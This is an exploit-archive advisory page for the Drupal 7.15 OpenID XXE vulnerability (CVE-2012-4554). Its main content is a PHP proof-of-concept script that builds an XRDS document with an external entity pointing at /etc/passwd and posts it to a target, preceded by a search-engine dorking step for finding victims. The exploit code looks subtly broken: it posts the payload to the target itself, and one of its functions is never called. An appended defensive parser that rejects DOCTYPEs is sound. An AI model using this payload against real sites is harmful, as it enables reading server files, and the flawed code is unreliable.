Drupal 7.15 XML Injection

Published: 13 Mar 2025 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news

Drupal 7.15 has an XML external entity (XXE) vulnerability in its OpenID module (CVE-2012-4554). The PoC below builds an XRDS document whose external entity points at a local file on the server.

Related

Reporter | Title | Published
Circl | CVE-2012-4554 | 29 May 2018 15:50
Check Point Advisories | Dries Buytaert Drupal Core OpenID Module Information Disclosure (CVE-2012-4554) | 3 Dec 2012 00:00
CVE | CVE-2012-4554 | 11 Nov 2012 11:00
Cvelist | CVE-2012-4554 | 11 Nov 2012 11:00
Debian CVE | CVE-2012-4554 | 11 Nov 2012 11:00
Drupal | SA-CORE-2012-003 - Drupal core - Arbitrary PHP code execution and Information disclosure | 17 Oct 2012 00:00
Tenable Nessus | Drupal 7.x < 7.16 Multiple Vulnerabilities | 24 Oct 2012 00:00
Metasploit | Drupal OpenID External Entity Injection | 24 Jan 2014 00:04
NVD | CVE-2012-4554 | 11 Nov 2012 13:00
OpenVAS | FreeBSD Ports: drupal7 | 26 Nov 2012 00:00

=============================================================================================================================================
    | # Title     : Drupal 7.15 via OpenID XXE vulnerability                                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://new.drupal.org/home                                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
    [+] Code Description: XXE vulnerability in Drupal via OpenID
    
       (Related : https://packetstorm.news/files/id/180671/ Linked CVE numbers: CVE-2012-4554 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 66
    
    [+] PayLoad :
    
    <?php
    
    /**
     * Exploit the XXE vulnerability in Drupal via OpenID
     */
    
    function send_openid_auth($target_uri, $identifier) {
        $url = rtrim($target_uri, '/') . "/?q=node&destination=node";
        
        $post_data = http_build_query([
            "openid_identifier" => $identifier,
            "name" => "",
            "pass" => "",
            "form_id" => "user_login_block",
            "op" => "Log in"
        ]);
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        return $response;
    }
    
    function generate_xrds($file_path) {
        // Fix the variables by setting valid values
        $xrds_ns = "xri://example.com/xrds";
        $xrd_ns = "xri://example.com/xrd";
        $v = "2.0";
    
        $xml = "<?xml version='1.0' encoding='UTF-8'?>";
        $xml .= "<!DOCTYPE foo [ <!ELEMENT URI ANY> <!ENTITY xxe SYSTEM 'file://$file_path'> ]>";
        $xml .= "<xrds:XRDS xmlns:xrds='$xrds_ns' xmlns='$xrd_ns*($v)' xmlns:openid='http://openid.net/xmlns/1.0'>";
        $xml .= "<XRD><Service><Type>http://specs.openid.net/auth/2.0/signon</Type>";
        $xml .= "<URI>&xxe;</URI></Service></XRD></xrds:XRDS>";
        
        return $xml;
    }
    
    function exploit_xxe($target_uri, $file_path) {
        $xrds_data = generate_xrds($file_path);
        $xrds_url = rtrim($target_uri, '/') . "/malicious.xrds";
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $xrds_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $xrds_data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/xrds+xml']);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        if (strpos($response, "<URI>") !== false) {
            preg_match('/<URI>(.*?)<\/URI>/', $response, $matches);
            return isset($matches[1]) ? $matches[1] : "File content not found.";
        }
        return "Exploit failed or file not readable.";
    }
    
    $target = "http://example.com/drupal";
    $file_to_read = "/etc/passwd";
    $result = exploit_xxe($target, $file_to_read);
    echo "Extracted File Content:\n" . $result;
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
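
The defensive counterpart to the PoC above, as an added example that is not part of the original advisory and is not Drupal's own code: an XRDS parser for OpenID discovery that rejects any document carrying a DOCTYPE, so no entity can be declared or resolved. The function name `parse_xrds_safely` is hypothetical, both sample documents are constructed, and the XRD namespace used is the standard `xri://$xrd*($v=2.0)`.

```php
<?php
// Added example, not Drupal's code: parse an XRDS discovery document and
// refuse any DOCTYPE, so no entity (internal or external) can be declared.
function parse_xrds_safely(string $xml): array {
    if ($xml === '') {
        return ['ok' => false, 'reason' => 'empty document', 'uris' => []];
    }
    // PHP < 8.0: switch the external entity loader off explicitly.
    // From PHP 8.0 it is off by default and this call is deprecated.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // LIBXML_NONET blocks network fetches. LIBXML_NOENT and LIBXML_DTDLOAD
    // are deliberately absent: no entity substitution, no external DTD.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        return ['ok' => false, 'reason' => 'not well-formed', 'uris' => []];
    }
    // A discovery document has no need for a DTD: reject it outright,
    // before any element content is read.
    foreach ($dom->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            return ['ok' => false, 'reason' => 'DOCTYPE not allowed', 'uris' => []];
        }
    }
    $uris = [];
    // Single quotes: the "$" characters in the namespace are literal.
    foreach ($dom->getElementsByTagNameNS('xri://$xrd*($v=2.0)', 'URI') as $node) {
        $uris[] = trim($node->textContent);
    }
    return ['ok' => true, 'reason' => '', 'uris' => $uris];
}

// Constructed sample inputs (not captured traffic).
$benign = '<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v=2.0)">'
        . '<XRD><Service><Type>http://specs.openid.net/auth/2.0/signon</Type>'
        . '<URI>https://op.example/auth</URI></Service></XRD></xrds:XRDS>';
$with_dtd = '<!DOCTYPE x [ <!ENTITY e "constructed"> ]>'
          . '<XRDS><XRD><Service><URI>&e;</URI></Service></XRD></XRDS>';

foreach (['benign' => $benign, 'with DOCTYPE' => $with_dtd] as $label => $doc) {
    $r = parse_xrds_safely($doc);
    echo $label, ': ', $r['ok'] ? implode(', ', $r['uris']) : 'rejected (' . $r['reason'] . ')', "\n";
}
```

Per the Tenable Nessus entry in the related list, Drupal 7.x releases before 7.16 are the affected versions, so upgrading remains the primary fix; a DOCTYPE check like this one is a secondary control for any code that parses untrusted XRDS or other XML.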

Vulners AI Score: 7.2 (High risk)
CVSS 2: 5
EPSS: 0.55084